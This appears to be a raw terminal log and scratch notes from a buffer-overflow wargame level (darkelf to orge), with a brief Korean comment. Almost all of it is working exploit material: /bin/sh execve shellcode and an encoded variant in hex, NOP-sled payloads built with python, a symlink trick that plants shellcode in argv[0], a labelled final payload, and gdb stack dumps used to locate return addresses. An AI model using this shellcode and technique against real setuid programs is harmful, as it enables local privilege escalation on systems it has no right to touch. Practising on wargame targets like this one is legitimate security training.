aaaaa \x90 * 45 \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80


\x90 *44 \xbf\xbf\xbf\xbf
`python -c 'print "\x90"*44+"\xbf\xbf\xbf\xbf"


`python -c 'print "aaaa"+"\x90"*42+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"aaaa"'`




aaaa a*19
\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81
aaaa


파일이름 생성 후 심볼릭으로 만들었음  ->orge
`python -c 'print "aaaa"+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"aaaa"+"a"*19'`


최종 페이로드 // `python -c 'print "\x90"*44+"\x36\xfb\xff\xbf"'`















































	}

	strcpy(buffer, argv[1]); 
	printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);
}
[darkelf@localhost darkelf]$ ls -l
total 24
lrwxrwxrwx    1 darkelf  darkelf         4 Mar 19 15:53 asdf -> orge
-rwsr-sr-x    1 orge     orge        12700 Mar  1  2010 orge
-rw-r--r--    1 root     root          800 Mar 29  2010 orge.c
-rw-rw-r--    1 darkelf  darkelf        64 Mar 19 16:02 payload.txt
[darkelf@localhost darkelf]$ ln -s
ln: missing file argument
Try `ln --help' for more information.
[darkelf@localhost darkelf]$ ln -s asdf orge
ln: orge: File exists
[darkelf@localhost darkelf]$ ln -s fdsa orge
ln: orge: File exists
[darkelf@localhost darkelf]$ ln -s orge fdsa
[darkelf@localhost darkelf]$ ./fdsa
argv error
[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "AAAA"'`
[darkelf@localhost darkelf]$ ./AAAA
argv error
[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "aaaaa"+"\x90"*45+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `aaaaa1￐h//shh/bin⏓ኂ°
                                                     ̀' to `orge': No such file or directory
[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "aaaaa"+"\x90"*45+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `aaaaa1￐h//shh/bin⏓ኂ°
                                                     ̀' to `orge': No such file or directory
[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "aaaaa"+"\x90"*45+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `aaaaa1￐h//shh/bin⏓ኂ°
                                                     ̀' to `orge': No such file or directory
[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "aaaaa"+"\x90"*45+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `aaaaa1￐h//shh/bin⏓ኂ°
                                                     ̀' to `orge': No such file or directory
[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "aaaaa"+"\x41"*45+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `aaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1￐h//shh/bin⏓ኂ°
                                                                                                  ̀' to `orge': No such file or directory
[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "AAAAs"'`
[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "aaaaa"+"\x41"*45'`
[darkelf@localhost darkelf]$ ./aaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
argv error
[darkelf@localhost darkelf]$ ./aaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA fd
argv[0] error
[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "aaaaa"+"\x41"*45+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `aaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1￐h//shh/bin⏓ኂ°
                                                                                                  ̀' to `orge': No such file or directory
[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "aaaaa"+"\x41"*45+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `aaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1￐h//shh/bin⏓ኂ°
                                                                                                  ̀' to `orge': No such file or directory
[darkelf@localhost darkelf]$ bash2
[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "aaaaa"+"\x90"*45+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `aaaaa1￐h//shh/bin⏓ኂ°
                                                     ̀' to `orge': No such file or directory
[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "aaaaa"+"\x90"*40+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"aaaaa"'`
ln: cannot create symbolic link `aaaaa1￐h//shh/bin⏓ኂ°
                                                     ̀aaaaa' to `orge': No such file or directory
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "aaaaa"+"\x90"*40+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"aaaaa"'`
ln: cannot create symbolic link `aaaaa1￐h//shh/bin⏓ኂ°
                                                     ̀aaaaa' to `orge': No such file or directory
[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "aaaa"+"\x90"*42+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"aaaa"'`  
ln: cannot create symbolic link `aaaa1￐h//shh/bin⏓ኂ°
                                                    ̀aaaa' to `orge': No such file or directory
[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "aaaa"+"a"*19+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"aaaa"'`
[darkelf@localhost darkelf]$ ls -l 
total 24
lrwxrwxrwx    1 darkelf  darkelf         4 Mar 23 23:31 AAAA -> orge
lrwxrwxrwx    1 darkelf  darkelf         4 Mar 23 23:34 AAAAs -> orge
lrwxrwxrwx    1 darkelf  darkelf         4 Mar 23 23:34 aaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -> orge
lrwxrwxrwx    1 darkelf  darkelf         4 Mar 24 00:05 aaaaaaaaaaaaaaaaaaaaaaa龞1ɱ2?l?ÿ??羵ꀨ쀿ÿ2i00tii0cjo?㐔?࿱?̿aaaa -> orge
lrwxrwxrwx    1 darkelf  darkelf         4 Mar 19 15:53 asdf -> orge
lrwxrwxrwx    1 darkelf  darkelf         4 Mar 23 23:30 fdsa -> orge
-rwsr-sr-x    1 orge     orge        12700 Mar  1  2010 orge
-rw-r--r--    1 root     root          800 Mar 29  2010 orge.c
-rw-rw-r--    1 darkelf  darkelf        64 Mar 19 16:02 payload.txt
[darkelf@localhost darkelf]$ ./aaaaa
aaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA                           aaaaaaaaaaaaaaaaaaaaaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaa
[darkelf@localhost darkelf]$ ./aaaaa
bash2: ./aaaaa: No such file or directory
[darkelf@localhost darkelf]$ ./aaaaa
aaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA                           aaaaaaaaaaaaaaaaaaaaaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaa
[darkelf@localhost darkelf]$ ./aaaaa
aaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA                           aaaaaaaaaaaaaaaaaaaaaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaa
[darkelf@localhost darkelf]$ ./aaaaa
aaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA                           aaaaaaaaaaaaaaaaaaaaaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaa
[darkelf@localhost darkelf]$ ./aaaaa
aaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA                           aaaaaaaaaaaaaaaaaaaaaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaa
[darkelf@localhost darkelf]$ ./aaaaa
aaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA                           aaaaaaaaaaaaaaaaaaaaaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaa
[darkelf@localhost darkelf]$ ./aaaaa
aaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA                           aaaaaaaaaaaaaaaaaaaaaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaa
[darkelf@localhost darkelf]$ ./aaaaa
aaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA                           aaaaaaaaaaaaaaaaaaaaaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaa
[darkelf@localhost darkelf]$ ./aaaaa
aaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA                           aaaaaaaaaaaaaaaaaaaaaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaa
[darkelf@localhost darkelf]$ ./aaaaa
aaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA                           aaaaaaaaaaaaaaaaaaaaaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaa
[darkelf@localhost darkelf]$ ./aaaaa
aaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA                           aaaaaaaaaaaaaaaaaaaaaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaa
[darkelf@localhost darkelf]$ ./aaaaa
aaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA                           aaaaaaaaaaaaaaaaaaaaaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaa
[darkelf@localhost darkelf]$ rm -f AAAA                                                                                                                                                                         
[darkelf@localhost darkelf]$ rm -f AAAAs
[darkelf@localhost darkelf]$ rm -f fdsa 
[darkelf@localhost darkelf]$ ls -l
total 24
lrwxrwxrwx    1 darkelf  darkelf         4 Mar 23 23:34 aaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -> orge
lrwxrwxrwx    1 darkelf  darkelf         4 Mar 24 00:05 aaaaaaaaaaaaaaaaaaaaaaa龞1ɱ2?l?ÿ??羵ꀨ쀿ÿ2i00tii0cjo?㐔?࿱?̿aaaa -> orge
lrwxrwxrwx    1 darkelf  darkelf         4 Mar 19 15:53 asdf -> orge
-rwsr-sr-x    1 orge     orge        12700 Mar  1  2010 orge
-rw-r--r--    1 root     root          800 Mar 29  2010 orge.c
-rw-rw-r--    1 darkelf  darkelf        64 Mar 19 16:02 payload.txt
[darkelf@localhost darkelf]$ rm -f aaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
[darkelf@localhost darkelf]$ rm -f aaaaaaaaaaaaaaaaaaaaaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaa 
[darkelf@localhost darkelf]$ ls -
ls: -: No such file or directory
[darkelf@localhost darkelf]$ ls -l
total 24
lrwxrwxrwx    1 darkelf  darkelf         4 Mar 19 15:53 asdf -> orge
-rwsr-sr-x    1 orge     orge        12700 Mar  1  2010 orge
-rw-r--r--    1 root     root          800 Mar 29  2010 orge.c
-rw-rw-r--    1 darkelf  darkelf        64 Mar 19 16:02 payload.txt
[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "aaaa"+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"aaaa"+"a"*19'`
[darkelf@localhost darkelf]$ ls -l./aaaa
ls: invalid option -- .
Try `ls --help' for more information.
[darkelf@localhost darkelf]$ ./aaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaaaaaaaaaaaaaaaaaaaaa 
argv error
[darkelf@localhost darkelf]$ ./aaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaaaaaaaaaaaaaaaaaaaaa d
stack is still your friend.
[darkelf@localhost darkelf]$ ./aaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaaaaaaaaaaaaaaaaaaaaa `python -c 'print "\x90"*44+"\xbf\xbf\xbf\xbf"
> ;
> 
[darkelf@localhost darkelf]$ d
bash2: d: command not found
[darkelf@localhost darkelf]$ ./aaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaaaaaaaaaaaaaaaaaaaaa `python -c 'print "\x90"*44+"\xbf\xbf\xbf\xbf"'`
¿¿¿¿
Segmentation fault
[darkelf@localhost darkelf]$ mkdir asdf
mkdir: cannot create directory `asdf': File exists
[darkelf@localhost darkelf]$ mkdir temp
[darkelf@localhost darkelf]$ ls
aaaa龞1ɱ2?l?ÿ??羵ꀨ쀿ÿ2i00tii0cjo?㐔?࿱?̿aaaaaaaaaaaaaaaaaaaaaaa  asdf  orge  orge.c  payload.txt  temp
[darkelf@localhost darkelf]$ cp orge temp/orge
[darkelf@localhost darkelf]$ ls temp
orge
[darkelf@localhost darkelf]$ cd temp
[darkelf@localhost temp]$ ls
orge
[darkelf@localhost temp]$ ln -s orge `python -c 'print "aaaa"+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"aaaa"+"a"*19'`
[darkelf@localhost temp]$ ./aaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaaaaaaaaaaaaaaaaaaaaa 
argv error
[darkelf@localhost temp]$ ./aaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaaaaaaaaaaaaaaaaaaaaa `python -c 'print "\x90"*44+"\xbf\xbf\xbf\xbf"'`
¿¿¿¿
Segmentation fault (core dumped)
[darkelf@localhost temp]$ ls
aaaa龞1ɱ2?l?ÿ??羵ꀨ쀿ÿ2i00tii0cjo?㐔?࿱?̿aaaaaaaaaaaaaaaaaaaaaaa  core  orge
[darkelf@localhost temp]$ gdb -q -c core
Core was generated by `./aaaa鐞1ɱ2lÿ瀵쩪ÿÿÿ2i00tii0cjo㐔⚱
                                                        ΁aaaaaaaaaaaaaaaaaaaaaaa '.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
Xshell(gdb) q     
[darkelf@localhost temp]$ gdb -q -c core
Core was generated by `./aaaa鐞1ɱ2lÿ瀵쩪ÿÿÿ2i00tii0cjo㐔⚱
                                                        ΁aaaaaaaaaaaaaaaaaaaaaaa '.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/100 $esp
0xbffff9e0:	0x00000000	0xbffffa24	0xbffffa30	0x40013868
0xbffff9f0:	0x00000002	0x08048450	0x00000000	0x08048471
0xbffffa00:	0x08048500	0x00000002	0xbffffa24	0x08048390
0xbffffa10:	0x0804866c	0x4000ae60	0xbffffa1c	0x40013e90
0xbffffa20:	0x00000002	0xbffffb34	0xbffffb82	0x00000000
0xbffffa30:	0xbffffbb3	0xbffffbca	0xbffffbe3	0xbffffc02
0xbffffa40:	0xbffffc24	0xbffffc31	0xbffffdf4	0xbffffe13
0xbffffa50:	0xbffffe30	0xbffffe45	0xbffffe64	0xbffffe6f
0xbffffa60:	0xbffffe89	0xbffffe99	0xbffffea1	0xbffffeab
0xbffffa70:	0xbffffebb	0xbffffec9	0xbffffed7	0xbffffee8
0xbffffa80:	0xbffffef3	0xbfffff06	0xbfffff49	0xbfffff99
0xbffffa90:	0x00000000	0x00000003	0x08048034	0x00000004
0xbffffaa0:	0x00000020	0x00000005	0x00000006	0x00000006
0xbffffab0:	0x00001000	0x00000007	0x40000000	0x00000008
0xbffffac0:	0x00000000	0x00000009	0x08048450	0x0000000b
0xbffffad0:	0x000001fa	0x0000000c	0x000001fa	0x0000000d
0xbffffae0:	0x000001fa	0x0000000e	0x000001fa	0x00000010
0xbffffaf0:	0x0fabfbff	0x0000000f	0xbffffb2f	0x00000000
0xbffffb00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb10:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb20:	0x00000000	0x00000000	0x00000000	0x69000000
0xbffffb30:	0x00363836	0x61612f2e	0x11eb6161	0xb1c9315e
0xbffffb40:	0x0e6c8032	0xe98001ff	0xebf67501	0xffeae805
0xbffffb50:	0xc132ffff	0x30306951	0x30696974	0x8a6f6a63
0xbffffb60:	0x8a5451e4	0x0cb19ae2	0x616181ce	0x61616161
(gdb) 
0xbffffb70:	0x61616161	0x61616161	0x61616161	0x61616161
0xbffffb80:	0x90900061	0x90909090	0x90909090	0x90909090
0xbffffb90:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffba0:	0x90909090	0x90909090	0x90909090	0xbfbf9090
0xbffffbb0:	0x0000bfbf	0x00000000	0x00000000	0x00000000
0xbffffbc0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbd0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbe0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbf0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc10:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc20:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc30:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc40:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc50:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffca0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcb0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcc0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcd0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffce0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcf0:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) 
0xbffffd00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd10:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd20:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd30:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd40:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd50:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffda0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdb0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdc0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdd0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffde0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdf0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe10:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe20:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe30:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe40:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe50:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe80:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) x/100 $esp-100
0xbffff97c:	0x4005d920	0x400143e0	0xbffff99c	0x40066070
0xbffff98c:	0x40106980	0x4000ae60	0xbffffa24	0xbffff9d8
0xbffff99c:	0x08048639	0xbffff9b0	0x00000000	0x00000028
0xbffff9ac:	0x00000018	0x00000000	0x00000000	0x00000000
0xbffff9bc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffff9cc:	0x00000000	0x00000000	0x00000000	0x90909090
0xbffff9dc:	0xbfbfbfbf	0x00000000	0xbffffa24	0xbffffa30
0xbffff9ec:	0x40013868	0x00000002	0x08048450	0x00000000
0xbffff9fc:	0x08048471	0x08048500	0x00000002	0xbffffa24
0xbffffa0c:	0x08048390	0x0804866c	0x4000ae60	0xbffffa1c
0xbffffa1c:	0x40013e90	0x00000002	0xbffffb34	0xbffffb82
0xbffffa2c:	0x00000000	0xbffffbb3	0xbffffbca	0xbffffbe3
0xbffffa3c:	0xbffffc02	0xbffffc24	0xbffffc31	0xbffffdf4
0xbffffa4c:	0xbffffe13	0xbffffe30	0xbffffe45	0xbffffe64
0xbffffa5c:	0xbffffe6f	0xbffffe89	0xbffffe99	0xbffffea1
0xbffffa6c:	0xbffffeab	0xbffffebb	0xbffffec9	0xbffffed7
0xbffffa7c:	0xbffffee8	0xbffffef3	0xbfffff06	0xbfffff49
0xbffffa8c:	0xbfffff99	0x00000000	0x00000003	0x08048034
0xbffffa9c:	0x00000004	0x00000020	0x00000005	0x00000006
0xbffffaac:	0x00000006	0x00001000	0x00000007	0x40000000
0xbffffabc:	0x00000008	0x00000000	0x00000009	0x08048450
0xbffffacc:	0x0000000b	0x000001fa	0x0000000c	0x000001fa
0xbffffadc:	0x0000000d	0x000001fa	0x0000000e	0x000001fa
0xbffffaec:	0x00000010	0x0fabfbff	0x0000000f	0xbffffb2f
0xbffffafc:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) 
0xbffffb0c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb1c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb2c:	0x69000000	0x00363836	0x61612f2e	0x11eb6161
0xbffffb3c:	0xb1c9315e	0x0e6c8032	0xe98001ff	0xebf67501
0xbffffb4c:	0xffeae805	0xc132ffff	0x30306951	0x30696974
0xbffffb5c:	0x8a6f6a63	0x8a5451e4	0x0cb19ae2	0x616181ce
0xbffffb6c:	0x61616161	0x61616161	0x61616161	0x61616161
0xbffffb7c:	0x61616161	0x90900061	0x90909090	0x90909090
0xbffffb8c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb9c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffbac:	0xbfbf9090	0x0000bfbf	0x00000000	0x00000000
0xbffffbbc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbcc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbdc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbec:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbfc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc0c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc1c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc2c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc3c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc4c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc5c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc6c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc7c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc8c:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) x/100 $esp-100
0xbffff97c:	0x4005d920	0x400143e0	0xbffff99c	0x40066070
0xbffff98c:	0x40106980	0x4000ae60	0xbffffa24	0xbffff9d8
0xbffff99c:	0x08048639	0xbffff9b0	0x00000000	0x00000028
0xbffff9ac:	0x00000018	0x00000000	0x00000000	0x00000000
0xbffff9bc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffff9cc:	0x00000000	0x00000000	0x00000000	0x90909090
0xbffff9dc:	0xbfbfbfbf	0x00000000	0xbffffa24	0xbffffa30
0xbffff9ec:	0x40013868	0x00000002	0x08048450	0x00000000
0xbffff9fc:	0x08048471	0x08048500	0x00000002	0xbffffa24
0xbffffa0c:	0x08048390	0x0804866c	0x4000ae60	0xbffffa1c
0xbffffa1c:	0x40013e90	0x00000002	0xbffffb34	0xbffffb82
0xbffffa2c:	0x00000000	0xbffffbb3	0xbffffbca	0xbffffbe3
0xbffffa3c:	0xbffffc02	0xbffffc24	0xbffffc31	0xbffffdf4
0xbffffa4c:	0xbffffe13	0xbffffe30	0xbffffe45	0xbffffe64
0xbffffa5c:	0xbffffe6f	0xbffffe89	0xbffffe99	0xbffffea1
0xbffffa6c:	0xbffffeab	0xbffffebb	0xbffffec9	0xbffffed7
0xbffffa7c:	0xbffffee8	0xbffffef3	0xbfffff06	0xbfffff49
0xbffffa8c:	0xbfffff99	0x00000000	0x00000003	0x08048034
0xbffffa9c:	0x00000004	0x00000020	0x00000005	0x00000006
0xbffffaac:	0x00000006	0x00001000	0x00000007	0x40000000
